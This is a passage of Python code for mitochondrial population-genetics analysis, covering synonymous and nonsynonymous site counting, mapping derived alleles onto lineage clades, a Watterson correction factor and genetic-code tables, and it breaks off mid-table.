mut2 = 'C' + site2 + site3
mut3 = 'T' + site2 + site3
elif site1 == 'T':
mut1 = 'A' + site2 + site3
mut2 = 'C' + site2 + site3
mut3 = 'G' + site2 + site3
if site2 == 'A':
mut4 = site1 + 'C' + site3
mut5 = site1 + 'G' + site3
mut6 = site1 + 'T' + site3
elif site2 == 'C':
mut4 = site1 + 'A' + site3
mut5 = site1 + 'G' + site3
mut6 = site1 + 'T' + site3
elif site2 == 'G':
mut4 = site1 + 'A' + site3
mut5 = site1 + 'C' + site3
mut6 = site1 + 'T' + site3
elif site2 == 'T':
mut4 = site1 + 'A' + site3
mut5 = site1 + 'C' + site3
mut6 = site1 + 'G' + site3
if site3 == 'A':
mut7 = site1 + site2 + 'C'
mut8 = site1 + site2 + 'G'
mut9 = site1 + site2 + 'T'
elif site3 == 'C':
mut7 = site1 + site2 + 'A'
mut8 = site1 + site2 + 'G'
mut9 = site1 + site2 + 'T'
elif site3 == 'G':
mut7 = site1 + site2 + 'A'
mut8 = site1 + site2 + 'C'
mut9 = site1 + site2 + 'T'
elif site3 == 'T':
mut7 = site1 + site2 + 'A'
mut8 = site1 + site2 + 'C'
mut9 = site1 + site2 + 'G'
if codonNum == 0:
aaList = []
if codon in startCodons:
currAA = 'M'
else:
currAA = geneticCode[codon]
if mut1 in startCodons:
aaList.append('M')
else:
aaList.append(geneticCode[mut1])
if mut2 in startCodons:
aaList.append('M')
else:
aaList.append(geneticCode[mut2])
if mut3 in startCodons:
aaList.append('M')
else:
aaList.append(geneticCode[mut3])
if mut4 in startCodons:
aaList.append('M')
else:
aaList.append(geneticCode[mut4])
if mut5 in startCodons:
aaList.append('M')
else:
aaList.append(geneticCode[mut5])
if mut6 in startCodons:
aaList.append('M')
else:
aaList.append(geneticCode[mut6])
if mut7 in startCodons:
aaList.append('M')
else:
aaList.append(geneticCode[mut7])
if mut8 in startCodons:
aaList.append('M')
else:
aaList.append(geneticCode[mut8])
if mut9 in startCodons:
aaList.append('M')
else:
aaList.append(geneticCode[mut9])
else:
aaList = [geneticCode[mut1],geneticCode[mut2],geneticCode[mut3], geneticCode[mut4],geneticCode[mut5],geneticCode[mut6],geneticCode[mut7],geneticCode[mut8],geneticCode[mut9]]
currAA = geneticCode[codon]
for aa in aaList:
if aa == currAA:
currS += 1.0
else:
currN += 1.0
conRad1 = aaSchemeDict1[(currAA,aa)]
conRad2 = aaSchemeDict2[(currAA,aa)]
conRad3 = aaSchemeDict3[(currAA,aa)]
conRad4 = aaSchemeDict4[(currAA,aa)]
conRad5 = aaSchemeDict5[(currAA,aa)]
conRad6 = aaSchemeDict6[(currAA,aa)]
conRad7 = aaSchemeDict7[(currAA,aa)]
if conRad1 == 'R':
currR1 += 1
else:
currC1 += 1
if conRad2 == 'R':
currR2 += 1
else:
currC2 += 1
if conRad3 == 'R':
currR3 += 1
else:
currC3 += 1
if conRad4 == 'R':
currR4 += 1
else:
currC4 += 1
if conRad5 == 'R':
currR5 += 1
else:
currC5 += 1
if conRad6 == 'R':
currR6 += 1
else:
currC6 += 1
if conRad7 == 'R':
currR7 += 1
else:
currC7 += 1
currS /= 3.0
currN /= 3.0
currC1 /= 3.0
currC2 /= 3.0
currC3 /= 3.0
currC4 /= 3.0
currC5 /= 3.0
currC6 /= 3.0
currC7 /= 3.0
currR1 /= 3.0
currR2 /= 3.0
currR3 /= 3.0
currR4 /= 3.0
currR5 /= 3.0
currR6 /= 3.0
currR7 /= 3.0
totalSynSites += currS
totalNonsynSites += currN
totalC1Sites += currC1
totalR1Sites += currR1
totalC2Sites += currC2
totalR2Sites += currR2
totalC3Sites += currC3
totalR3Sites += currR3
totalC4Sites += currC4
totalR4Sites += currR4
totalC5Sites += currC5
totalR5Sites += currR5
totalC6Sites += currC6
totalR6Sites += currR6
totalC7Sites += currC7
totalR7Sites += currR7
codonNum += 1
return [totalSynSites,totalNonsynSites,totalC1Sites,totalR1Sites,totalC2Sites,totalR2Sites,totalC3Sites,totalR3Sites,totalC4Sites,totalR4Sites,totalC5Sites,totalR5Sites,totalC6Sites,totalR6Sites,totalC7Sites,totalR7Sites]
def mapChanges(fasta):
    """Tabulate derived (non-outgroup) alleles across the alignment and map
    each one onto the smallest clade that contains every carrier.

    For every alignment column, alleles differing from the outgroup sequence
    are reported to stdout as a tab-separated row (gene, site, codon column,
    carrier list, carrier count, allele list, outgroup nucleotide), followed
    by the clades consistent with that allele when it is shared by more than
    one individual.

    Parameters:
        fasta -- path/handle passed straight to buildCodonDict(); sequence
                 names containing '$' are treated as in-group ('*' marks
                 sexual lineages), all others as outgroup.

    Side effects: writes the table to sys.stdout; returns None.
    """
    # clade label -> exact set of sequence names composing that clade
    cladeDict = {'A': ['>$Heron2', '>$clone_1', '>$Rotoiti_1_4n', '>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n', '>$Poerua_triploid', '>$Brunner_6_3n', '>$McGregor', '>$Poerua_72_4n', '>$Gunn', '>$*Lady', '>$Grasmere_1_4n', '>$*Kaniere_1_2n', '>$*Rotoroa_1_2n', '>$*AlexMap', '>$*Alexsex', '>$*Yellow_Contig_56', '>$clone_7', '>$DenmarkA', '>$Duluth', '>$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237', '>$*Ianthe', '>$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309', '>$Waik37', '>$Waik372', '>$Tarawera', '>$Kaniere_triploid', '>$Waik36', '>$WalesC', '>$Brunner_2_4n'], 'B': ['>$Waik37', '>$Waik372', '>$Tarawera', '>$Kaniere_triploid', '>$Waik36', '>$WalesC', '>$Brunner_2_4n'], 'C': ['>$Waik37', '>$Waik372', '>$Tarawera', '>$Kaniere_triploid', '>$Waik36', '>$WalesC'], 'D': ['>$Waik37', '>$Waik372', '>$Tarawera', '>$Kaniere_triploid', '>$Waik36'], 'E': ['>$Waik37', '>$Waik372', '>$Tarawera', '>$Kaniere_triploid'], 'F': ['>$Waik37', '>$Waik372', '>$Tarawera'], 'G': ['>$Heron2', '>$clone_1', '>$Rotoiti_1_4n', '>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n', '>$Poerua_triploid', '>$Brunner_6_3n', '>$McGregor', '>$Poerua_72_4n', '>$Gunn', '>$*Lady', '>$Grasmere_1_4n', '>$*Kaniere_1_2n', '>$*Rotoroa_1_2n', '>$*AlexMap', '>$*Alexsex', '>$*Yellow_Contig_56', '>$clone_7', '>$DenmarkA', '>$Duluth', '>$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237', '>$*Ianthe', '>$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309'], 'H': ['>$*Ianthe', '>$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309'], 'I': ['>$Heron2', '>$clone_1', '>$Rotoiti_1_4n', '>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n', '>$Poerua_triploid', '>$Brunner_6_3n', '>$McGregor', '>$Poerua_72_4n', '>$Gunn', '>$*Lady', '>$Grasmere_1_4n', '>$*Kaniere_1_2n', '>$*Rotoroa_1_2n', '>$*AlexMap', '>$*Alexsex', '>$*Yellow_Contig_56', '>$clone_7', '>$DenmarkA', '>$Duluth', '>$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237'], 'J': ['>$clone_7', '>$DenmarkA', '>$Duluth', '>$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237'], 'K': ['>$clone_7', '>$DenmarkA', '>$Duluth'], 'L': ['>$clone_7', '>$DenmarkA'], 'M': ['>$Heron2', '>$clone_1', '>$Rotoiti_1_4n', '>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n', '>$Poerua_triploid', '>$Brunner_6_3n', '>$McGregor', '>$Poerua_72_4n', '>$Gunn', '>$*Lady', '>$Grasmere_1_4n', '>$*Kaniere_1_2n', '>$*Rotoroa_1_2n', '>$*AlexMap', '>$*Alexsex', '>$*Yellow_Contig_56'], 'N': ['>$*AlexMap', '>$*Alexsex', '>$*Yellow_Contig_56'], 'O': ['>$Heron2', '>$clone_1', '>$Rotoiti_1_4n', '>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n', '>$Poerua_triploid', '>$Brunner_6_3n', '>$McGregor', '>$Poerua_72_4n', '>$Gunn', '>$*Lady', '>$Grasmere_1_4n', '>$*Kaniere_1_2n', '>$*Rotoroa_1_2n'], 'P': ['>$Heron2', '>$clone_1', '>$Rotoiti_1_4n', '>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n', '>$Poerua_triploid', '>$Brunner_6_3n', '>$McGregor', '>$Poerua_72_4n', '>$Gunn', '>$*Lady', '>$Grasmere_1_4n', '>$*Kaniere_1_2n'], 'Q': ['>$*Lady', '>$Grasmere_1_4n', '>$*Kaniere_1_2n'], 'R': ['>$*Lady', '>$Grasmere_1_4n'], 'S': ['>$Heron2', '>$clone_1', '>$Rotoiti_1_4n', '>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n', '>$Poerua_triploid', '>$Brunner_6_3n', '>$McGregor', '>$Poerua_72_4n', '>$Gunn'], 'T': ['>$McGregor', '>$Poerua_72_4n', '>$Gunn'], 'U': ['>$McGregor', '>$Poerua_72_4n'], 'V': ['>$Heron2', '>$clone_1', '>$Rotoiti_1_4n', '>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n', '>$Poerua_triploid', '>$Brunner_6_3n'], 'W': ['>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n', '>$Poerua_triploid'], 'X': ['>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n'], 'Y': ['>$Heron2', '>$clone_1', '>$Rotoiti_1_4n'], 'Z': ['>$Heron2', '>$clone_1']}
    positionDict = {(0,1533):'COI',(1533,2217):'COII',(2217,2373):'ATP8',(2373,3066):'ATP6',(3066,4005):'ND1',(4005,4509):'ND6',(4509,5646):'CYTB',(5646,5940):'ND4L',(5940,7314):'ND4',(7314,9030):'ND5',(9030,9807):'COIII',(9807,10158):'ND3',(10158,11214):'ND2'} #{(start,stop):gene}
    seqDict, seqList, codonDict = buildCodonDict(fasta)
    # Clades ordered smallest-first so the tightest containing clade is tested first.
    cladeList = ['H','L','R','U','Z','F','K','N','Q','T','Y','X','E','J','W','D','C','B','V','S','P','O','M','I','G','A']
    popList = []
    sexList = []
    outList = []
    asexList = []
    # Partition sequences: '$' marks in-group members ('*' = sexual lineage),
    # everything else is outgroup.
    for seq in seqList:
        if '$' in seq:
            popList.append(seq)
            if '*' in seq:
                sexList.append(seq)
            else:
                asexList.append(seq)
        else:
            outList.append(seq)
    outSeq = seqDict[outList[0]]
    sys.stdout.write('Total Polymorphisms\nGene\tSite\tCodon\tLineages w/ Derived Allele\t# Individuals w/ derived allele\tAlleles\tP. est\n')
    i = 0
    while i < len(seqDict[seqList[0]]):
        outNuc = outSeq[i]
        # NOTE(review): `gene` stays False for sites past the last locus; it is
        # then concatenated into the output string below — presumably the
        # alignment never exceeds position 11214. Confirm against input data.
        gene = False
        for locus in positionDict:
            start = locus[0]
            stop = locus[1]
            # Half-open [start, stop): adjacent loci share a boundary
            # coordinate (e.g. COI ends where COII starts at 1533), so an
            # inclusive upper bound would let two genes match the same site
            # and leave the winner to arbitrary dict ordering.
            if start <= i < stop:
                gene = positionDict[locus]
        # allele -> list of carrier sequence names at this column
        currAlleleDict = {}
        currAlleleList = []
        for seq in popList:
            currSeq = seqDict[seq]
            currNuc = currSeq[i]
            if currNuc not in currAlleleDict and 'N' != currNuc and '-' != currNuc:
                currAlleleDict[currNuc] = [seq]
                currAlleleList.append(currNuc)
            elif 'N' != currNuc and '-' != currNuc:
                currList = currAlleleDict[currNuc]
                currList.append(seq)
                currAlleleDict[currNuc] = currList
        if len(currAlleleDict) > 1:  # polymorphic site
            for nuc in currAlleleList:
                if nuc != outNuc:  # derived allele relative to outgroup
                    # Work on a COPY: the original aliased cladeList and then
                    # removed from it while iterating it, which both skipped
                    # clades mid-scan and corrupted the master ordering for
                    # every subsequent allele and site.
                    currCladeList = list(cladeList)
                    currList = currAlleleDict[nuc]
                    # Drop every clade that does not contain all carriers.
                    for group in cladeList:
                        compClade = cladeDict[group]
                        removeClade = False
                        for lineage in currList:
                            if lineage not in compClade:
                                removeClade = True
                        if removeClade:
                            currCladeList.remove(group)
                    # Diagnostic dump of the surviving clades (single-arg
                    # print() behaves identically under Python 2 and 3).
                    print(currCladeList)
                    # NOTE(review): the "Codon" column prints (i*3)+1, i.e. it
                    # maps as if i were a codon index, while "Site" is the
                    # nucleotide index i+1 — verify which was intended.
                    if len(currAlleleDict[nuc]) > 1:
                        sys.stdout.write(gene + '\t' + str(i + 1) + '\t' + str((i*3)+1) + '\t' + str(currAlleleDict[nuc]) + '\t' + str(len(currAlleleDict[nuc])) + '\t' + str(currAlleleList) + '\t' + outNuc)
                        for clade in currCladeList:
                            sys.stdout.write('\t' + str(cladeDict[clade]))
                        sys.stdout.write('\n')
                    else:
                        sys.stdout.write(gene + '\t' + str(i + 1) + '\t' + str((i*3)+1) + '\t' + str(currAlleleDict[nuc]) + '\t' + str(len(currAlleleDict[nuc])) + '\t' + str(currAlleleList) + '\t' + outNuc + '\n')
        i += 1
def aN(N):
    """Return Watterson's correction factor a_N = sum_{k=1}^{N-1} 1/k.

    This is the harmonic-number denominator used to estimate theta from the
    number of segregating sites. For N <= 1 the sum is empty and 0.0 is
    returned.

    Parameters:
        N -- sample size (number of sequences).

    Returns:
        float -- the partial harmonic sum over k = 1 .. N-1.
    """
    # Start the fold at 0.0 so an empty range still yields a float,
    # matching the original accumulator initialisation.
    return sum((1.0 / k for k in range(1, N)), 0.0)
def thetaU(fasta,code='invertebrateMt'):
geneticCodes = {'standard':{"TTT":"F", "TTC":"F", "TTA":"L", "TTG":"L", "TCT":"S", "TCC":"S", "TCA":"S", "TCG":"S", "TAT":"Y", "TAC":"Y", "TAA":"*", "TAG":"*", "TGT":"C", "TGC":"C", "TGA":"*", "TGG":"W", "CTT":"L", "CTC":"L", "CTA":"L", "CTG":"L", "CCT":"P", "CCC":"P", "CCA":"P", "CCG":"P", "CAT":"H", "CAC":"H", "CAA":"Q", "CAG":"Q", "CGT":"R", "CGC":"R", "CGA":"R", "CGG":"R", "ATT":"I", "ATC":"I", "ATA":"I", "ATG":"M", "ACT":"T", "ACC":"T", "ACA":"T", "ACG":"T", "AAT":"N", "AAC":"N", "AAA":"K", "AAG":"K", "AGT":"S", "AGC":"S", "AGA":"R", "AGG":"R", "GTT":"V", "GTC":"V", "GTA":"V", "GTG":"V", "GCT":"A", "GCC":"A", "GCA":"A", "GCG":"A", "GAT":"D", "GAC":"D", "GAA":"E", "GAG":"E", "GGT":"G", "GGC":"G", "GGA":"G", "GGG":"G"},'invertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'vertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': '*', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': '*', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 
'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'yeastMt':{'CTT': 'T', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'T', 'CTA': 'T', 'CTC': 'T', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'coelenterateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'ciliateNuc':{'CTT': 'L', 'TAG': 'Q', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 
'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Q', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'echinodermMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'euplotidNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'C', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 
'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'bacterial':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'yeastNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'S', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'ascidianMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'G', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'G', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 
'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'flatwormMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Y', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'chlorophyceanMt':{'CTT': 'L', 'TAG': 'L', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 